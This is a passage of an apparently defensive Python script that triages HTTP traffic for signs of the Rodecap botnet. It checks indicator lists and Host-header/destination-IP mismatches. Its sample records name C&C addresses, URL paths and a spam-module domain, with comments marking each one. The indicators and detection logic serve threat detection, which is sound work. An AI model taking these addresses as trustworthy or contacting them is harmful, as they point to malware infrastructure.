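    if rec.user_agent in BARE_USER_AGENTS:
        hits.append("bare-user-agent")
    return hits


def host_mismatch(rec: HttpRecord, resolve: Callable[[str], set[str]]) -> bool:
    """True when the Host header names a domain that does not resolve to dst_ip.
    `resolve` is injected so the check runs offline; in production it is your
    resolver's A lookup or a passive-DNS cache. Names it cannot resolve are not flagged."""
    expected = resolve(rec.host_header)
    return bool(expected) and rec.dst_ip not in expected


def triage(records: Iterable[HttpRecord],
           resolve: Callable[[str], set[str]]) -> list[tuple[HttpRecord, list[str]]]:
    flagged = []
    for rec in records:
        hits = ioc_hits(rec)
        if host_mismatch(rec, resolve):
            hits.append("host-header-mismatch")
        if hits:
            flagged.append((rec, hits))
    return flagged


# Constructed sample data. 203.0.113.10 is a documentation-range placeholder standing in
# for a real www.google.com address; it is not Google's.
STUB_DNS = {"www.google.com": {"203.0.113.10"}, "t.newsleter.org": {"95.163.104.93"}}
SAMPLE = [
    HttpRecord("95.163.104.68", "www.google.com", "Mozilla/5.0", "/protocol.php"),   # Rodecap main C&C
    HttpRecord("203.0.113.10", "www.google.com",
               "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0", "/"),  # benign
    HttpRecord("95.163.104.93", "t.newsleter.org", "-", "/d/t14.php"),               # spam module
    HttpRecord("95.163.100.1", "example.invalid", "curl/7.30.0", "/"),               # only the /18 matches
]


def stub_resolve(name: str) -> set[str]:
    return STUB_DNS.get(name.lower(), set())


if __name__ == "__main__":
    for rec, hits in triage(SAMPLE, stub_resolve):
        print(rec.dst_ip, rec.host_header, hits)
```

The Host/destination mismatch is the durable part: the domains and addresses above will rot, but a client that sends a Host header for a name that does not resolve to the address it connected to is worth a look regardless of which campaign is behind it.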




